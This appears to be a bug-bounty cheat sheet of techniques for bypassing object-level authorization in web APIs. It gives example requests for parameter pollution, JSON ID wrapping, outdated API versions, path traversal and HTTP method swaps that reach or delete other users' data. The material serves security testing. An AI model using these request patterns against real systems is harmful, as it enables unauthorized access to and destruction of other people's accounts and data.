Bypass Object Level Authorization.
Add parameters onto the endpoints if not present by default.
- GET /api_v1/messages → 200 OK
GET /api_v1/messages?user_id=victim_uuid → 200 OK
HTTP Parameter Pollution.
Give multiple values for the same parameter.
- GET /api_v1/messages?user_id=ATTACKER_ID&user_id=VICTIM_ID
GET /api_v1/messages?user_id=VICTIM_ID&user_id=ATTACKER_ID
Change File type.
Add different file extensions at the end, e.g. .json, .xml, .config
- GET /user_data/2341 → 401 Unauthorized
GET /user_data/2341.json → 200 OK
JSON Parameter Pollution
- POST /api/get_profile
Content-Type: application/json
Wrap the ID with an array in the body.
- {“id”:111} → 401 Unauthriozied
{“id”:[111]} → 200 OK
Wrap the ID with a JSON object.
- {“id”:111} → 401 Unauthriozied
{“id”:{“id”:111}} → 200 OK
Test an outdated API version.
Try different versions of the API.
- GET /v3/users_data/1234 → 403 Forbidden
GET /v1/users_data/1234 → 200 OK
Test the same web endpoint in mobile application
- Sometimes the web application might be using encoded or hashed ids but the mobile endpoint still uses numeric ids
Do not giveup on Error messages
- Sometimes applications will throw an error message even if the request was executed successfully at the backend
Bruteforce Hidden HTTP Parameters
- Use tools like Arjun, paramminer which bruteforces common id parameter names against the endpoint to see if any of them works
Google Dorking/ Public Forums
- Search all the endpoints having ID's which the search engine may have already indexed
Never ignore encoded/ hashed ID's
- For hashed ID's, create multiple accounts and understand the pattern application uses to allot an ID
Send Wildcard instead of an ID
- GET /api/users/<user_id>/ → GET /api/users/*
Swap 2 UUID.
Create 2 accounts and swap each other's UUID. (Autorize Burp plugin)
- GET /v1/orders?cartid=account_2 → 200 OK
Missing Function Level Access Control (MFLAC)
- GET /admin/profile → 401 Unauthorized
GET /ADMIN/profile → 200 OK
Swap non-numeric with numeric ID's
- GET /file?id=90ri2xozifke29ikedaw0d
GET /file?id=302
Change Request Content-Type
- Content-type: application/xml → Content-type: application/json
Path Traversal
Secondary Context Path Traversal techniques
- POST /users/delete/VICTIM_ID → 403 Forbidden
POST /users/delete/MY_ID/../VICTIM_ID → 200 OK
Change HTTP method
- GET /users/delete/VICTIM_ID → 403 Forbidden
POST /users/delete/VICTIM_ID → 200 OK
- Created by: Mufaddal Masalawala
Twitter: @muffymas